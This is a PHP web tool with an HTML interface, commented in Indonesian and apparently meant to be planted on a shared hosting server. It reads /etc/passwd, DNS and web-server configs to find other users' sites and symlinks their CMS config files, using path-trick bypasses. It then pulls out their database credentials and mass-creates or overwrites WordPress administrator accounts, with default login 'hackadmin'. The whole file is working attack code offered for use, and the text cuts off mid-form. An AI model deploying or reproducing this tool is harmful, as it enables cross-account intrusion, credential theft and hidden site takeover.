<?php
// AUTO CMS SYMLINK SCANNER - WITH DOMAIN DETECTION FROM named.conf & /etc/passwd
error_reporting(0);
set_time_limit(0);

$FOLDER = "sym_config";
if(!is_dir($FOLDER)) {
    mkdir($FOLDER, 0777);
    $htaccess = "Require all granted\nOptions +Indexes +FollowSymLinks\nDirectoryIndex disabled";
    @file_put_contents("$FOLDER/.htaccess", $htaccess);
}

// FUNGSI DETEKSI DOMAIN DARI named.conf
function getDomainsFromNamedConf() {
    $domains = [];

    // Cek berbagai lokasi named.conf
    $named_paths = [
        '/etc/named.conf',
        '/etc/bind/named.conf',
        '/usr/local/etc/named.conf',
        '/etc/named/named.conf',
        '/var/named/etc/named.conf'
    ];

    foreach($named_paths as $path) {
        if(@file_exists($path)) {
            $content = @file_get_contents($path);
            if($content) {
                // Cari zone domain
                preg_match_all('/zone\s+"([^"]+)"\s+{/', $content, $matches);
                foreach($matches[1] as $domain) {
                    if(!in_array($domain, $domains) && strpos($domain, '.') !== false) {
                        $domains[] = $domain;
                    }
                }

                // Cari juga dari file include
                preg_match_all('/include\s+"([^"]+)"/', $content, $includes);
                foreach($includes[1] as $include) {
                    if(@file_exists($include)) {
                        $include_content = @file_get_contents($include);
                        if($include_content) {
                            preg_match_all('/zone\s+"([^"]+)"\s+{/', $include_content, $zone_matches);
                            foreach($zone_matches[1] as $domain) {
                                if(!in_array($domain, $domains) && strpos($domain, '.') !== false) {
                                    $domains[] = $domain;
                                }
                            }
                        }
                    }
                }
            }
        }
    }

    return $domains;
}

// FUNGSI DETEKSI DOMAIN DARI /etc/passwd & Apache/Nginx Config
function getDomainsFromPasswdAndConfigs() {
    $user_domains = [];

    // Baca /etc/passwd
    if(@file_exists('/etc/passwd')) {
        $passwd = @file_get_contents('/etc/passwd');
        if($passwd) {
            $lines = explode("\n", $passwd);
            foreach($lines as $line) {
                if(empty($line)) continue;
                $parts = explode(':', $line);
                if(count($parts) >= 6) {
                    $username = $parts[0];
                    $home = $parts[5];

                    // Skip system users
                    if($username == 'root' || $username == 'daemon' || $username == 'bin' ||
                       $username == 'sys' || $username == 'sync' || $username == 'games' ||
                       $username == 'man' || $username == 'lp' || $username == 'mail' ||
                       $username == 'news' || $username == 'uucp' || $username == 'proxy' ||
                       $username == 'www-data' || $username == 'backup' || $username == 'list' ||
                       $username == 'irc' || $username == 'gnats' || $username == 'nobody' ||
                       $username == 'systemd' || $username == 'nobody' || strlen($username) > 20) {
                        continue;
                    }

                    // Cek public_html dan subdomain
                    $public_paths = [
                        "$home/public_html",
                        "$home/www",
                        "$home/web",
                        "$home/htdocs",
                        "$home/domains",
                        "$home/subdomains"
                    ];

                    foreach($public_paths as $path) {
                        if(@is_dir($path)) {
                            // Cari domain dari folder structure
                            $user_domains[] = [
                                'user' => $username,
                                'home' => $home,
                                'path' => $path,
                                'type' => 'user_home'
                            ];
                            break;
                        }
                    }
                }
            }
        }
    }

    return $user_domains;
}

// FUNGSI DETEKSI DOMAIN DARI APACHE/NIGNX CONFIG
function getDomainsFromWebConfigs() {
    $domains = [];

    // Apache configs
    $apache_paths = [
        '/etc/apache2/sites-enabled/',
        '/etc/apache2/sites-available/',
        '/etc/httpd/conf.d/',
        '/etc/httpd/conf/extra/',
        '/usr/local/apache/conf/extra/',
        '/usr/local/etc/apache2/vhosts/'
    ];

    foreach($apache_paths as $path) {
        if(@is_dir($path)) {
            $files = @scandir($path);
            if($files) {
                foreach($files as $file) {
                    if($file == '.' || $file == '..') continue;
                    $fullpath = $path . $file;
                    if(@is_file($fullpath)) {
                        $content = @file_get_contents($fullpath);
                        if($content) {
                            // Cari ServerName dan ServerAlias
                            preg_match_all('/ServerName\s+([^\s]+)/i', $content, $names);
                            foreach($names[1] as $domain) {
                                if(!in_array($domain, $domains)) {
                                    $domains[] = $domain;
                                }
                            }

                            preg_match_all('/ServerAlias\s+([^\s]+)/i', $content, $aliases);
                            foreach($aliases[1] as $domain) {
                                if(!in_array($domain, $domains)) {
                                    $domains[] = $domain;
                                }
                            }
                        }
                    }
                }
            }
        }
    }

    // Nginx configs
    $nginx_paths = [
        '/etc/nginx/sites-enabled/',
        '/etc/nginx/sites-available/',
        '/etc/nginx/conf.d/',
        '/usr/local/nginx/conf/vhosts/'
    ];

    foreach($nginx_paths as $path) {
        if(@is_dir($path)) {
            $files = @scandir($path);
            if($files) {
                foreach($files as $file) {
                    if($file == '.' || $file == '..') continue;
                    $fullpath = $path . $file;
                    if(@is_file($fullpath)) {
                        $content = @file_get_contents($fullpath);
                        if($content) {
                            // Cari server_name
                            preg_match_all('/server_name\s+([^;]+)/i', $content, $names);
                            foreach($names[1] as $name_str) {
                                $name_parts = preg_split('/\s+/', $name_str);
                                foreach($name_parts as $domain) {
                                    $domain = trim($domain);
                                    if(!empty($domain) && $domain != '_' && !in_array($domain, $domains)) {
                                        $domains[] = $domain;
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
    }

    return $domains;
}

// FUNGSI SCAN CMS DENGAN DOMAIN
function scanCMSwithDomain($home, $domain = null) {
    $cms_list = [];
    if(!$handle = @opendir($home)) return $cms_list;

    while(false !== ($user = readdir($handle))) {
        if($user == '.' || $user == '..') continue;
        $user_home = "$home/$user";
        if(!@is_dir($user_home)) continue;

        $web_paths = [
            "$user_home/public_html",
            "$user_home/www",
            "$user_home/web",
            "$user_home/htdocs",
            "$user_home/domains/$domain/public_html",
            "$user_home/$domain"
        ];

        foreach($web_paths as $web_path) {
            if(@is_dir($web_path)) {
                // WORDPRESS
                if(@file_exists("$web_path/wp-config.php")) {
                    $cms_list[] = [
                        'user' => $user,
                        'type' => 'WordPress',
                        'config' => "$web_path/wp-config.php",
                        'icon' => '⚙️',
                        'path' => $web_path,
                        'domain' => $domain
                    ];
                }
                // LARAVEL
                if(@file_exists("$web_path/.env")) {
                    $cms_list[] = [
                        'user' => $user,
                        'type' => 'Laravel',
                        'config' => "$web_path/.env",
                        'icon' => '🎯',
                        'path' => $web_path,
                        'domain' => $domain
                    ];
                }
                // CODEIGNITER
                if(@file_exists("$web_path/application/config/database.php")) {
                    $cms_list[] = [
                        'user' => $user,
                        'type' => 'CodeIgniter',
                        'config' => "$web_path/application/config/database.php",
                        'icon' => '🔥',
                        'path' => $web_path,
                        'domain' => $domain
                    ];
                }
                // JOOMLA
                if(@file_exists("$web_path/configuration.php")) {
                    $cms_list[] = [
                        'user' => $user,
                        'type' => 'Joomla',
                        'config' => "$web_path/configuration.php",
                        'icon' => '🌐',
                        'path' => $web_path,
                        'domain' => $domain
                    ];
                }
                // DRUPAL
                if(@file_exists("$web_path/sites/default/settings.php")) {
                    $cms_list[] = [
                        'user' => $user,
                        'type' => 'Drupal',
                        'config' => "$web_path/sites/default/settings.php",
                        'icon' => '🐘',
                        'path' => $web_path,
                        'domain' => $domain
                    ];
                }
                // MAGENTO
                if(@file_exists("$web_path/app/etc/env.php")) {
                    $cms_list[] = [
                        'user' => $user,
                        'type' => 'Magento',
                        'config' => "$web_path/app/etc/env.php",
                        'icon' => '🛒',
                        'path' => $web_path,
                        'domain' => $domain
                    ];
                }
            }
        }
    }
    closedir($handle);
    return $cms_list;
}

function createSymlinkBypass($target, $linkname) {
    $techniques = [$target, "////$target", "/./$target", "/../$target", realpath($target) ?: $target, urlencode($target)];
    foreach($techniques as $tech) {
        if(@symlink($tech, $linkname)) {
            @chmod($linkname, 0777);
            return true;
        }
    }
    return false;
}

function extractDBinfo($filepath) {
    if(!@file_exists($filepath)) return [];
    $content = @file_get_contents($filepath);
    $info = ['type' => 'Unknown', 'db' => '', 'user' => '', 'pass' => '', 'host' => '', 'prefix' => 'wp_'];

    if(preg_match("/define\s*\(\s*'DB_NAME'\s*,\s*'([^']+)'/", $content, $match)) {
        $info['type'] = 'WordPress';
        $info['db'] = $match[1];
        preg_match("/define\s*\(\s*'DB_USER'\s*,\s*'([^']+)'/", $content, $match) && ($info['user'] = $match[1]);
        preg_match("/define\s*\(\s*'DB_PASSWORD'\s*,\s*'([^']+)'/", $content, $match) && ($info['pass'] = $match[1]);
        preg_match("/define\s*\(\s*'DB_HOST'\s*,\s*'([^']+)'/", $content, $match) && ($info['host'] = $match[1]);
        preg_match("/\$table_prefix\s*=\s*'([^']+)'/", $content, $match) && ($info['prefix'] = $match[1]);
    }
    elseif(preg_match("/DB_DATABASE=([^\s\n]+)/", $content, $match)) {
        $info['type'] = 'Laravel';
        $info['db'] = $match[1];
        preg_match("/DB_USERNAME=([^\s\n]+)/", $content, $match) && ($info['user'] = $match[1]);
        preg_match("/DB_PASSWORD=([^\s\n]+)/", $content, $match) && ($info['pass'] = $match[1]);
        preg_match("/DB_HOST=([^\s\n]+)/", $content, $match) && ($info['host'] = $match[1]);
    }
    return $info;
}

function createOrUpdateWordPressAdmin($db_config, $admin_data) {
    try {
        $mysqli = @new mysqli($db_config['host'], $db_config['user'], $db_config['pass'], $db_config['db']);
        if ($mysqli->connect_error) {
            return ['success' => false, 'error' => 'Koneksi DB gagal: ' . $mysqli->connect_error];
        }

        $prefix = $db_config['prefix'];
        $table_users = $prefix . 'users';
        $table_usermeta = $prefix . 'usermeta';

        $check_users = $mysqli->query("SHOW TABLES LIKE '{$table_users}'");
        if(!$check_users || $check_users->num_rows === 0) {
            $search = $mysqli->query("SHOW TABLES LIKE '%users'");
            if($search && $search->num_rows > 0) {
                $row = $search->fetch_row();
                $table_users = $row[0];
                if(substr($table_users, -6) === '_users') {
                    $prefix = substr($table_users, 0, -6) . '_';
                    $table_usermeta = $prefix . 'usermeta';
                }
            } else {
                return ['success' => false, 'error' => 'Tabel users tidak ditemukan'];
            }
        }

        $check_usermeta = $mysqli->query("SHOW TABLES LIKE '{$table_usermeta}'");
        if(!$check_usermeta || $check_usermeta->num_rows === 0) {
            return ['success' => false, 'error' => 'Tabel usermeta tidak ditemukan'];
        }

        $hashed_password = password_hash($admin_data['password'], PASSWORD_BCRYPT);
        $now = date('Y-m-d H:i:s');
        $display_name = !empty($admin_data['display_name']) ? $admin_data['display_name'] : $admin_data['username'];

        $check_stmt = $mysqli->prepare("SELECT ID FROM {$table_users} WHERE user_login = ?");
        if(!$check_stmt) {
            return ['success' => false, 'error' => 'Prepare statement gagal: ' . $mysqli->error];
        }

        $check_stmt->bind_param("s", $admin_data['username']);
        $check_stmt->execute();
        $check_result = $check_stmt->get_result();

        if($check_result && $check_result->num_rows > 0) {
            $row = $check_result->fetch_assoc();
            $user_id = $row['ID'];
            $check_stmt->close();

            $update_stmt = $mysqli->prepare("UPDATE {$table_users} SET user_pass = ?, user_email = ?, display_name = ? WHERE ID = ?");
            if($update_stmt) {
                $update_stmt->bind_param("sssi", $hashed_password, $admin_data['email'], $display_name, $user_id);
                $update_stmt->execute();
                $update_stmt->close();
            }

            $cap_key = $prefix . 'capabilities';
            $cap_value = 'a:1:{s:13:"administrator";b:1;}';

            $check_cap = $mysqli->prepare("SELECT umeta_id FROM {$table_usermeta} WHERE user_id = ? AND meta_key = ?");
            if($check_cap) {
                $check_cap->bind_param("is", $user_id, $cap_key);
                $check_cap->execute();
                $cap_result = $check_cap->get_result();

                if($cap_result && $cap_result->num_rows > 0) {
                    $update_cap = $mysqli->prepare("UPDATE {$table_usermeta} SET meta_value = ? WHERE user_id = ? AND meta_key = ?");
                    if($update_cap) {
                        $update_cap->bind_param("sis", $cap_value, $user_id, $cap_key);
                        $update_cap->execute();
                        $update_cap->close();
                    }
                } else {
                    $insert_cap = $mysqli->prepare("INSERT INTO {$table_usermeta} (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
                    if($insert_cap) {
                        $insert_cap->bind_param("iss", $user_id, $cap_key, $cap_value);
                        $insert_cap->execute();
                        $insert_cap->close();
                    }
                }
                $check_cap->close();
            }

            $level_key = $prefix . 'user_level';
            $level_value = '10';

            $check_level = $mysqli->prepare("SELECT umeta_id FROM {$table_usermeta} WHERE user_id = ? AND meta_key = ?");
            if($check_level) {
                $check_level->bind_param("is", $user_id, $level_key);
                $check_level->execute();
                $level_result = $check_level->get_result();

                if($level_result && $level_result->num_rows > 0) {
                    $update_level = $mysqli->prepare("UPDATE {$table_usermeta} SET meta_value = ? WHERE user_id = ? AND meta_key = ?");
                    if($update_level) {
                        $update_level->bind_param("sis", $level_value, $user_id, $level_key);
                        $update_level->execute();
                        $update_level->close();
                    }
                } else {
                    $insert_level = $mysqli->prepare("INSERT INTO {$table_usermeta} (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
                    if($insert_level) {
                        $insert_level->bind_param("iss", $user_id, $level_key, $level_value);
                        $insert_level->execute();
                        $insert_level->close();
                    }
                }
                $check_level->close();
            }

            $mysqli->close();
            return [
                'success' => true,
                'user_id' => $user_id,
                'action' => 'updated',
                'message' => "Admin {$admin_data['username']} updated successfully"
            ];

        } else {
            $check_stmt->close();

            $insert_stmt = $mysqli->prepare("INSERT INTO {$table_users} (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) VALUES (?, ?, ?, ?, ?, 0, ?)");
            if(!$insert_stmt) {
                return ['success' => false, 'error' => 'Prepare insert gagal: ' . $mysqli->error];
            }

            $insert_stmt->bind_param("ssssss", $admin_data['username'], $hashed_password, $admin_data['username'], $admin_data['email'], $now, $display_name);
            $insert_stmt->execute();
            $user_id = $mysqli->insert_id;
            $insert_stmt->close();

            if(!$user_id) {
                return ['success' => false, 'error' => 'Gagal insert user'];
            }

            $cap_key = $prefix . 'capabilities';
            $cap_value = 'a:1:{s:13:"administrator";b:1;}';
            $cap_stmt = $mysqli->prepare("INSERT INTO {$table_usermeta} (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
            if($cap_stmt) {
                $cap_stmt->bind_param("iss", $user_id, $cap_key, $cap_value);
                $cap_stmt->execute();
                $cap_stmt->close();
            }

            $level_key = $prefix . 'user_level';
            $level_value = '10';
            $level_stmt = $mysqli->prepare("INSERT INTO {$table_usermeta} (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
            if($level_stmt) {
                $level_stmt->bind_param("iss", $user_id, $level_key, $level_value);
                $level_stmt->execute();
                $level_stmt->close();
            }

            $mysqli->close();
            return [
                'success' => true,
                'user_id' => $user_id,
                'action' => 'created',
                'message' => "Admin {$admin_data['username']} created successfully"
            ];
        }

    } catch(Exception $e) {
        return ['success' => false, 'error' => 'Exception: ' . $e->getMessage()];
    }
}

// HANDLE POST AJAX REQUESTS
$input = json_decode(file_get_contents('php://input'), true);
if($input && isset($input['action'])) {
    header('Content-Type: application/json');
    $action = $input['action'];

    switch($action) {
        case 'scan':
            // Dapatkan semua domain dari named.conf
            $named_domains = getDomainsFromNamedConf();

            // Dapatkan user dari passwd
            $users_from_passwd = getDomainsFromPasswdAndConfigs();

            // Dapatkan domain dari web configs
            $web_domains = getDomainsFromWebConfigs();

            $all_cms = [];

            // Scan dari named.conf domains
            foreach($named_domains as $domain) {
                for($i = 0; $i <= 99; $i++) {
                    $home = $i == 0 ? "/home" : "/home$i";
                    if(@is_dir($home)) {
                        $cms_in_home = scanCMSwithDomain($home, $domain);
                        $all_cms = array_merge($all_cms, $cms_in_home);
                    }
                }
            }

            // Scan dari passwd users
            foreach($users_from_passwd as $user_data) {
                $cms_list = [];
                $web_paths = [
                    $user_data['path'],
                    $user_data['home'] . "/public_html",
                    $user_data['home'] . "/www",
                    $user_data['home'] . "/web"
                ];

                foreach($web_paths as $web_path) {
                    if(@is_dir($web_path)) {
                        if(@file_exists("$web_path/wp-config.php")) {
                            $all_cms[] = [
                                'user' => $user_data['user'],
                                'type' => 'WordPress',
                                'config' => "$web_path/wp-config.php",
                                'icon' => '⚙️',
                                'path' => $web_path,
                                'domain' => $user_data['user'] . '.local'
                            ];
                        }
                        if(@file_exists("$web_path/.env")) {
                            $all_cms[] = [
                                'user' => $user_data['user'],
                                'type' => 'Laravel',
                                'config' => "$web_path/.env",
                                'icon' => '🎯',
                                'path' => $web_path,
                                'domain' => $user_data['user'] . '.local'
                            ];
                        }
                    }
                }
            }

            // Tambahkan domain dari web configs sebagai info tambahan
            $all_cms = array_merge($all_cms, array_map(function($domain) {
                return [
                    'user' => 'detected_domain',
                    'type' => 'Domain_Info',
                    'config' => '',
                    'icon' => '🌐',
                    'path' => '',
                    'domain' => $domain,
                    'is_domain_only' => true
                ];
            }, $web_domains));

            // Hapus duplikat berdasarkan config path
            $unique_cms = [];
            foreach($all_cms as $cms) {
                $key = $cms['config'] ?: $cms['domain'];
                if(!isset($unique_cms[$key])) {
                    $unique_cms[$key] = $cms;
                }
            }

            echo json_encode(array_values($unique_cms));
            break;

        case 'get_domains':
            $named_domains = getDomainsFromNamedConf();
            $web_domains = getDomainsFromWebConfigs();
            echo json_encode([
                'named_domains' => $named_domains,
                'web_domains' => $web_domains
            ]);
            break;

        case 'get_users':
            $users = [];
            if(@file_exists('/etc/passwd')) {
                $passwd = @file_get_contents('/etc/passwd');
                if($passwd) {
                    $lines = explode("\n", $passwd);
                    foreach($lines as $line) {
                        if(empty($line)) continue;
                        $parts = explode(':', $line);
                        if(count($parts) >= 6) {
                            $username = $parts[0];
                            $home = $parts[5];
                            if(strlen($username) < 20 && $home != '/' && $home != '/nonexistent') {
                                $users[] = [
                                    'username' => $username,
                                    'home' => $home,
                                    'shell' => $parts[6] ?? ''
                                ];
                            }
                        }
                    }
                }
            }
            echo json_encode($users);
            break;

        case 'create':
            $target = $input['target'] ?? '';
            $username = $input['username'] ?? '';
            if($target && $username) {
                $safe_username = preg_replace('/[^a-zA-Z0-9_-]/', '_', $username);
                $linkname = $FOLDER . "/link_" . $safe_username;
                $counter = 1;
                $original_linkname = $linkname;
                while(file_exists($linkname)) {
                    $linkname = $original_linkname . "_" . $counter;
                    $counter++;
                }
                if(createSymlinkBypass($target, $linkname)) {
                    echo json_encode(['status' => 'success', 'link' => basename($linkname), 'username' => $username]);
                } else {
                    echo json_encode(['status' => 'error', 'message' => 'Failed to create symlink']);
                }
            } else {
                echo json_encode(['status' => 'error', 'message' => 'Missing target or username']);
            }
            break;

        case 'create_bulk':
            $targets = $input['targets'] ?? '';
            $usernames = $input['usernames'] ?? '';
            if($targets && $usernames) {
                $targets_array = explode('|', $targets);
                $usernames_array = explode('|', $usernames);
                $success_count = 0;
                $failed_count = 0;

                foreach($targets_array as $index => $target) {
                    if($target && @file_exists($target) && isset($usernames_array[$index])) {
                        $safe_username = preg_replace('/[^a-zA-Z0-9_-]/', '_', $usernames_array[$index]);
                        $linkname = $FOLDER . "/link_" . $safe_username;
                        $counter = 1;
                        $original_linkname = $linkname;
                        while(file_exists($linkname)) {
                            $linkname = $original_linkname . "_" . $counter;
                            $counter++;
                        }
                        if(createSymlinkBypass($target, $linkname)) {
                            $success_count++;
                        } else {
                            $failed_count++;
                        }
                        usleep(10000);
                    }
                }
                echo json_encode(['status' => 'success', 'count' => $success_count, 'failed' => $failed_count]);
            } else {
                echo json_encode(['status' => 'error', 'message' => 'No targets provided']);
            }
            break;

        case 'create_admin':
            $config_path = $input['config_path'] ?? '';
            $admin_data = $input['admin_data'] ?? [];

            if($config_path && $admin_data) {
                $db_info = extractDBinfo($config_path);
                if($db_info['type'] == 'WordPress') {
                    $result = createOrUpdateWordPressAdmin($db_info, $admin_data);
                    echo json_encode($result);
                } else {
                    echo json_encode(['success' => false, 'error' => 'Not a WordPress CMS']);
                }
            } else {
                echo json_encode(['success' => false, 'error' => 'Missing config path or admin data']);
            }
            break;

        case 'create_admin_bulk':
            $configs = $input['configs'] ?? [];
            $admin_data = $input['admin_data'] ?? [];
            $results = [];

            foreach($configs as $config_path) {
                $db_info = extractDBinfo($config_path);
                if($db_info['type'] == 'WordPress') {
                    $result = createOrUpdateWordPressAdmin($db_info, $admin_data);
                    $results[] = [
                        'config' => $config_path,
                        'result' => $result
                    ];
                }
            }
            echo json_encode(['success' => true, 'results' => $results]);
            break;

        case 'view':
            $link = $input['link'] ?? '';
            if($link && @is_link("$FOLDER/$link")) {
                $target = readlink("$FOLDER/$link");
                if(@file_exists($target)) {
                    echo @file_get_contents($target) ?: "Cannot read file";
                } else {
                    echo "File not found";
                }
            }
            break;

        case 'extract':
            $link = $input['link'] ?? '';
            if($link && @is_link("$FOLDER/$link")) {
                $target = readlink("$FOLDER/$link");
                echo json_encode(extractDBinfo($target));
            }
            break;

        case 'list':
            $links = [];
            if(is_dir($FOLDER)) {
                foreach(scandir($FOLDER) as $item) {
                    if($item == '.' || $item == '..') continue;
                    $path = "$FOLDER/$item";
                    if(is_link($path)) {
                        $links[] = ['name' => $item, 'target' => @readlink($path)];
                    }
                }
            }
            echo json_encode($links);
            break;

        case 'delete':
            $link = $input['link'] ?? '';
            if($link) @unlink("$FOLDER/$link");
            echo json_encode(['status' => 'deleted']);
            break;

        case 'delete_by_type':
            $type = $input['type'] ?? '';
            $count = 0;
            if($type && is_dir($FOLDER)) {
                foreach(scandir($FOLDER) as $item) {
                    if($item == '.' || $item == '..') continue;
                    if(is_link("$FOLDER/$item")) {
                        if(strpos($item, "link_") === 0) {
                            @unlink("$FOLDER/$item");
                            $count++;
                        }
                    }
                }
            }
            echo json_encode(['status' => 'deleted', 'count' => $count]);
            break;

        case 'delete_all':
            $count = 0;
            if(is_dir($FOLDER)) {
                foreach(scandir($FOLDER) as $item) {
                    if($item == '.' || $item == '..') continue;
                    if(is_link("$FOLDER/$item")) {
                        @unlink("$FOLDER/$item");
                        $count++;
                    }
                }
            }
            echo json_encode(['status' => 'deleted', 'count' => $count]);
            break;
    }
    exit;
}
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>🔍 CMS Symlink Scanner - With Domain Detection</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <style>
        .glow { text-shadow: 0 0 10px #0f0; }
        .pulse { animation: pulse 2s infinite; }
        @keyframes pulse { 0%, 100% { opacity: 1; } 50% { opacity: 0.7; } }
        .spin { animation: spin 1s linear infinite; }
        @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
        .total-badge {
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            padding: 4px 12px;
            border-radius: 20px;
            font-weight: bold;
            font-size: 12px;
        }
        .cms-scroll-container {
            max-height: 400px;
            overflow-y: auto;
            scrollbar-width: thin;
        }
        .cms-scroll-container::-webkit-scrollbar {
            width: 6px;
        }
        .cms-scroll-container::-webkit-scrollbar-track {
            background: #1f2937;
            border-radius: 10px;
        }
        .cms-scroll-container::-webkit-scrollbar-thumb {
            background: #4b5563;
            border-radius: 10px;
        }
        .modal {
            display: none;
            position: fixed;
            z-index: 1000;
            left: 0;
            top: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0,0,0,0.8);
        }
        .modal-content {
            background-color: #1f2937;
            margin: 5% auto;
            padding: 20px;
            border-radius: 10px;
            width: 90%;
            max-width: 500px;
            animation: slideDown 0.3s ease;
        }
        @keyframes slideDown {
            from { transform: translateY(-50px); opacity: 0; }
            to { transform: translateY(0); opacity: 1; }
        }
        .domain-badge {
            background: #00669b;
            padding: 2px 6px;
            border-radius: 4px;
            font-size: 9px;
            margin-left: 5px;
        }
    </style>
</head>
<body class="bg-gray-900 text-white p-4">
    <div class="max-w-7xl mx-auto">
        <!-- HEADER -->
        <div class="mb-8 p-6 bg-gradient-to-r from-gray-800 to-black rounded-xl border border-green-700">
            <h1 class="text-3xl font-bold mb-2 text-green-400 glow">🚀 CMS SYMLINK SCANNER</h1>
            <p class="text-gray-400 mb-4">Scan semua CMS, detect domain dari named.conf & /etc/passwd, create symlink, mass admin WordPress!</p>
            <div class="flex flex-wrap gap-2">
                <span class="bg-red-900/50 px-3 py-1 rounded">WordPress</span>
                <span class="bg-blue-900/50 px-3 py-1 rounded">Laravel</span>
                <span class="bg-purple-900/50 px-3 py-1 rounded">CodeIgniter</span>
                <span class="bg-yellow-900/50 px-3 py-1 rounded">Joomla</span>
                <span class="bg-pink-900/50 px-3 py-1 rounded">Drupal</span>
                <span class="bg-orange-900/50 px-3 py-1 rounded">Magento</span>
            </div>
            <div class="mt-3 text-sm text-yellow-400">🔍 Auto detect domain dari named.conf, /etc/passwd, Apache/Nginx config</div>
        </div>

        <!-- MAIN CONTROLS -->
        <div class="grid grid-cols-1 md:grid-cols-4 gap-6 mb-8">
            <div class="bg-gray-800 p-6 rounded-xl">
                <h2 class="text-xl font-bold mb-4 text-blue-400">🔍 SCAN SERVER</h2>
                <button onclick="scanServer()" id="scanBtn" class="w-full bg-gradient-to-r from-green-700 to-blue-700 hover:from-green-600 hover:to-blue-600 p-4 rounded-lg text-lg font-bold pulse">START FULL SCAN</button>
                <div id="scanStatus" class="mt-4 text-sm text-gray-400"></div>
            </div>

            <div class="bg-gray-800 p-6 rounded-xl">
                <h2 class="text-xl font-bold mb-4 text-purple-400">⚡ TOTAL SYMLINK</h2>
                <div class="text-center mb-3">
                    <div id="totalSymlinkCount" class="text-4xl font-bold text-yellow-400">0</div>
                    <div class="text-sm text-gray-400">Active Symlinks</div>
                </div>
                <button onclick="symlinkAllCMS()" id="symlinkAllBtn" class="w-full bg-gradient-to-r from-purple-700 to-pink-700 hover:from-purple-600 hover:to-pink-600 p-3 rounded-lg font-bold">🔗 SYMLINK ALL CMS</button>
            </div>

            <div class="bg-gray-800 p-6 rounded-xl">
                <h2 class="text-xl font-bold mb-4 text-yellow-400">📊 STATISTICS</h2>
                <div class="space-y-2 text-sm">
                    <div class="flex justify-between"><span>WordPress:</span><span id="wpCount" class="font-bold text-green-400">0</span></div>
                    <div class="flex justify-between"><span>Laravel:</span><span id="laravelCount" class="font-bold text-blue-400">0</span></div>
                    <div class="flex justify-between"><span>CodeIgniter:</span><span id="ciCount" class="font-bold text-purple-400">0</span></div>
                    <div class="flex justify-between"><span>Joomla:</span><span id="joomlaCount" class="font-bold text-yellow-400">0</span></div>
                    <div class="flex justify-between"><span>Drupal:</span><span id="drupalCount" class="font-bold text-pink-400">0</span></div>
                    <div class="flex justify-between"><span>Magento:</span><span id="magentoCount" class="font-bold text-orange-400">0</span></div>
                    <div class="flex justify-between"><span>Domains:</span><span id="domainCount" class="font-bold text-cyan-400">0</span></div>
                </div>
            </div>

            <div class="bg-gray-800 p-6 rounded-xl">
                <h2 class="text-xl font-bold mb-4 text-red-400">🛠️ ACTIONS</h2>
                <div class="space-y-3">
                    <button onclick="showDomainInfo()" class="w-full bg-cyan-700 hover:bg-cyan-600 p-3 rounded">🌐 Show Detected Domains</button>
                    <button onclick="viewActiveLinks()" class="w-full bg-blue-700 hover:bg-blue-600 p-3 rounded">🔄 Refresh Active Links</button>
                    <button onclick="clearAll()" class="w-full bg-red-700 hover:bg-red-600 p-3 rounded">🗑️ Clear All Symlinks</button>
                </div>
            </div>
        </div>

        <!-- RESULTS SECTION -->
        <div class="mb-8">
            <div class="flex justify-between items-center mb-4 flex-wrap gap-2">
                <h2 class="text-2xl font-bold text-green-400">📋 DETECTED CMS & DOMAINS</h2>
                <div class="flex gap-2">
                    <button onclick="openMassAdminModal()" class="bg-gradient-to-r from-red-700 to-orange-700 hover:from-red-600 hover:to-orange-600 px-6 py-2 rounded-lg font-bold flex items-center gap-2">
                        👑 MASS ADMIN WP
                    </button>
                    <button onclick="symlinkAllCMS()" class="bg-gradient-to-r from-purple-700 to-pink-700 hover:from-purple-600 hover:to-pink-600 px-6 py-2 rounded-lg font-bold flex items-center gap-2">
                        🔗 SYMLINK ALL (Total: <span id="totalCMSDetected">0</span>)
                    </button>
                </div>
            </div>
            <div id="results" class="space-y-4"></div>
        </div>

        <!-- ACTIVE SYMLINKS -->
        <div class="mb-8">
            <h2 class="text-2xl font-bold mb-4 text-blue-400">🔗 ACTIVE SYMLINKS</h2>
            <div id="links" class="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-3 gap-4"></div>
        </div>

        <!-- DATABASE INFO -->
        <div class="bg-gray-800 p-6 rounded-xl mb-8">
            <h2 class="text-2xl font-bold mb-4 text-yellow-400">🗃️ DATABASE INFO</h2>
            <div id="dbInfo" class="bg-black p-4 rounded"><p class="text-gray-500">No database info extracted yet</p></div>
        </div>
    </div>

    <!-- Modal Domain Info -->
    <div id="domainModal" class="modal">
        <div class="modal-content">
            <div class="flex justify-between items-center mb-4">
                <h2 class="text-2xl font-bold text-green-400">🌐 Detected Domains</h2>
                <button onclick="closeDomainModal()" class="text-gray-400 hover:text-white text-2xl">&times;</button>
            </div>
            <div id="domainList" class="space-y-2 max-h-96 overflow-y-auto">
                <div class="text-gray-400">Loading...</div>
            </div>
        </div>
    </div>

    <!-- Modal Mass Admin -->
    <div id="massAdminModal" class="modal">
        <div class="modal-content">
            <div class="flex justify-between items-center mb-4">
                <h2 class="text-2xl font-bold text-green-400">👑 Mass Admin WordPress</h2>
                <button onclick="closeMassAdminModal()" class="text-gray-400 hover:text-white text-2xl">&times;</button>
            </div>
            <div class="space-y-4">
                <div class="bg-yellow-900/30 p-2 rounded text-sm text-yellow-300">
                    ⚠️ Jika username sudah ada, akan diUPDATE (password & email diganti)
                </div>
                <div>
                    <label class="block text-sm font-bold mb-2">Username Admin</label>
                    <input type="text" id="adminUsername" class="w-full bg-gray-900 border border-gray-700 rounded p-2 text-white" placeholder="adminbaru" value="hackadmin">
                </div>
                <div>
                    <label class="block text-sm font-bold mb-2">Password</label>
                    <input type="text" id="adminPassword" class="w-full bg-gray-900 border border-gray-700 rounded p-2 text-white" placeholder="password" value="Hack123!@#">
                </div>
                <div>
                    <label class="block text-sm font-bold mb-2">Email</label>
                    <input type="email" id="adminEmail" class="w-full bg-gray-900 border border-gray-700 rounded p-2 text-white" placeholder="admin@example.com" value="admin@hack.com">
                </div>
                <div>
                    <label class="block text-sm font-bold mb-2">Display Name (opsional)</label>
